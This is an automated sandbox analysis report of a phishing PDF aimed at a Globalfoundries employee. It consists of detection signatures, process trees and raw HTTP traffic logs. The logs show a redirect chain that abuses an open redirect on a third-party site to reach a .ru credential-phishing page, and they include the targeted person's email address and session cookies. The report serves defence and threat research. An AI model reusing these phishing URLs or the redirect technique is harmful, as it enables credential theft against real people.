Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Globalfoundries.com_Report_46279.pdf

Overview

General Information

Sample name:Globalfoundries.com_Report_46279.pdf
Analysis ID:1524648
MD5:a3955fabbc8d8fdb7fe2d33f6b7f4bef
SHA1:9e2878acf46a395bfcbe097836a2dfeb2ef6fc21
SHA256:3c00ced55d85e11e84fbd8feb78f62c183df957e1859ca3ba9e3f622b0551581
Infos:

Detection

HTMLPhisher
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found potential malicious PDF (bad image similarity)
Yara detected HtmlPhish44
HTML page contains hidden javascript code
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware

Classification

  • System is w10x64
  • Acrobat.exe (PID: 6656 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Globalfoundries.com_Report_46279.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 7140 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 1908 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1736,i,15902866623834626839,14244420450878097098,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 7624 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://web.nvcc.com/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=6987&ListingID=7469&CategoryID=637&SubCategoryID=0&url=//dctools.mooo.com/smileyes/login/qwerty/lance.koyanagi@globalfoundries.com MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8044 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1996,i,15611262537185855656,1255272024732511954,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_207JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_207, type: DROPPED
    Source: https://ge6j.sisbousim.ru/jREPXBM/#klance.koyanagi@globalfoundries.comHTTP Parser: Base64 decoded: {"version":3,"sources":["/cfsetup_build/src/orchestrator/turnstile/templates/turnstile.scss","%3Cinput%20css%20qtFLbZ%3E"],"names":[],"mappings":"AAmCA,gBACI,GACI,uBClCN,CACF,CDqCA,kBACI,GACI,mBCnCN,CACF,CDsCA,iBACI,MAEI,cCrCN,CDwCE,IACI,mBCtCN,CACF,CDyCA...
    Source: https://ge6j.sisbousim.ru/jREPXBM/#klance.koyanagi@globalfoundries.comHTTP Parser: No favicon
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49739 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49742 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49793 version: TLS 1.2
    Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
    Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
    Source: Joe Sandbox ViewIP Address: 104.18.95.41 104.18.95.41
    Source: Joe Sandbox ViewIP Address: 151.101.2.137 151.101.2.137
    Source: Joe Sandbox ViewIP Address: 151.101.2.137 151.101.2.137
    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 23.217.172.185
    Source: unknownTCP traffic detected without corresponding DNS query: 23.217.172.185
    Source: unknownTCP traffic detected without corresponding DNS query: 23.217.172.185
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 23.217.172.185
    Source: unknownTCP traffic detected without corresponding DNS query: 23.217.172.185
    Source: unknownTCP traffic detected without corresponding DNS query: 23.217.172.185
    Source: unknownTCP traffic detected without corresponding DNS query: 23.217.172.185
    Source: unknownTCP traffic detected without corresponding DNS query: 23.217.172.185
    Source: unknownTCP traffic detected without corresponding DNS query: 23.217.172.185
    Source: unknownTCP traffic detected without corresponding DNS query: 23.217.172.185
    Source: unknownTCP traffic detected without corresponding DNS query: 23.217.172.185
    Source: unknownTCP traffic detected without corresponding DNS query: 23.217.172.185
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Xc14Vl+MOHmbebK&MD=R+GozY2U HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=6987&ListingID=7469&CategoryID=637&SubCategoryID=0&url=//dctools.mooo.com/smileyes/login/qwerty/lance.koyanagi@globalfoundries.com HTTP/1.1Host: web.nvcc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /smileyes/login/qwerty/lance.koyanagi@globalfoundries.com HTTP/1.1Host: dctools.mooo.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dctools.mooo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dctools.mooo.com/smileyes/login/qwerty/lance.koyanagi@globalfoundries.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jREPXBM/ HTTP/1.1Host: ge6j.sisbousim.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://dctools.mooo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dctools.mooo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ge6j.sisbousim.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ge6j.sisbousim.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ge6j.sisbousim.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ge6j.sisbousim.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ge6j.sisbousim.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc91295984a41f3&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ge6j.sisbousim.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ge6j.sisbousim.ru/jREPXBM/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFRS296M3hNM29JeEl3UGhlaXJtdmc9PSIsInZhbHVlIjoiUENjUG1BNVc4bEN4TGhzeDM3cW9YSXp5ZVhkL1daZStoQ0lDOTRMTWxlZ1BwNzJ4N1NBRU9waklUYU5XazhOQmRxZWptNUZXUkowZ04yUUdVTnFCZC9VcWx5Z0RGWm5qTUdIWnBVMnhEVDgrU3BzWXdvNXJBQzFMdUNuazJuamMiLCJtYWMiOiJhNmFkOTU3MWFhZTIxOTE4OWYyM2Y1MzBlNWU3YTU3ZWEwZTE1OTIyNWQzMDM2MTg4ZGYxMDcwODZlMDExMTZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InF4TFBlZUFwd0ViMjNyTEg5MzZKc2c9PSIsInZhbHVlIjoiak1xbnJPOU4wR29CS1hyN2VTb3FKQTFzUWgvZCt0eEQwWlRVcjlDY2s2TGNUc2RxTjB6cTV5WDF0bm0vSzVtL0hTYWFqbXovbnRuT2k3OU84VW5oOXp3a2pESjRBcmJab3RNaGc0NGQ4QkZSS0JkaDlzMHBMRFFhSHA4RkJZd2kiLCJtYWMiOiI5ZDcyMTI5MWFkYzQwNWRkOGUwMzExNzU3NTVmNGY5MjhkMGE2NTQ0MGU2NWZmMDIxYTYzMmU0ZmNkMzI5ZWI5IiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc91295984a41f3&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1195242463:1727915362:58hzP5tn3icoVJf6EYrrU2uDT5trH6Au5dft6Khkcu4/8cc91295984a41f3/d43438995eb8455 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8cc91295984a41f3/1727918039189/1e1d3f1a7f4c611cab85d49738b3396bff4366852f88450f1e05fb6b95046ea4/SZnlSi60Er37Q1I HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cc91295984a41f3/1727918039190/9M5zpoXvO6uqP1X HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cc91295984a41f3/1727918039190/9M5zpoXvO6uqP1X HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1195242463:1727915362:58hzP5tn3icoVJf6EYrrU2uDT5trH6Au5dft6Khkcu4/8cc91295984a41f3/d43438995eb8455 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Xc14Vl+MOHmbebK&MD=R+GozY2U HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ge6j.sisbousim.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc915a7fc91c407&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
